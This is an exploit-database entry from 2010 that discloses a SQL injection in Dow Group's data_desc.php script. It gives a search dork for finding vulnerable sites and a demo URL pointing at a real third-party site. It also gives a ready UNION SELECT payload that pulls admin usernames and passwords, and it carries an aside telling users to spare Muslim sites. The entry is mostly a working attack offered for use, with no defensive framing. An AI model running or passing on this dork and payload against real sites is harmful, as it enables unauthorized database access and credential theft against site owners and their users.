id: 10870
date: 02/12/2010
title: Dow Group (data_desc.php) SQL injection vulnerability
author: Memati
cves: 

=====================================================
Dow Group (data_desc.php) SQL injection vulnerability
=====================================================

===================================================================================+
# Exploit Title: dowgroup sql injection
# Date: 12-01-2010
# Author: Memati

==============================================================================

[*] Note : Keep Away Of Muslim Site

==============================================================================

[*] Script:               [ dowgroup ]

[*] Founder:              [ Memati ]

[*] Dork:                 [ Powered by www.dowgroup.com<http://www.dowgroup.com> ]
########################################################################



===[ Demo ]=== http://www.stocksforlife.com/data_desc.php?data=articles&id=80
===[ eXPLOIT ]=== union+select+1,concat_ws(0x3a,username,0x3a,password),3,4,5+from+admin--




#  0day.today [2023-03-26]  #